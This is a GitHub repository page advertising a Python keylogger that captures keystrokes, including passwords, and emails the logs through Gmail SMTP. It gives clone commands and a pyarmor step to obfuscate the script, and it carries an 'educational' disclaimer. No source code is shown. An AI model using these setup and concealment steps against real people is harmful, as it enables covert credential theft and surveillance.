Skip to content

Kuduxaaa/keylogger

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

16 Commits
 
 
 
 
 
 
 
 

Repository files navigation

Keylogger

A keylogger is a computer program that records all keys used by a computer user, especially passwords and other confidential information. I am not responsible for any illegal act done using this script. Use it with your own responsibility. The article is educational in nature. Its illegal use is punishable by law.

Privacy

As for usage and privacy, you must enter your personal information specifically the email username and password where you will be sent the logs and this information must be true in order for the script to be authenticated on the official Gmail server smtp.gmail.com:587 Before proceeding, please visit the following link: https://myaccount.google.com/lesssecureapps and enable access from less secure apps, otherwise the script will simply not work

Download

$ git clone https://github.com/Kuduxaaa/keylogger
$ cd keylogger
$ # Edit files

Obfuscate code

If you want to obfuscate files so that no one else can see your passwords:

$ sudo pip3 install pyarmor
$ pyarmor o keylogger_smtp.py

Links

Keystroke Logging - Wikipedia

What is keylogger

Cybercrime

About

Keyloggers in python [local, smtp, ftp]

Topics

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages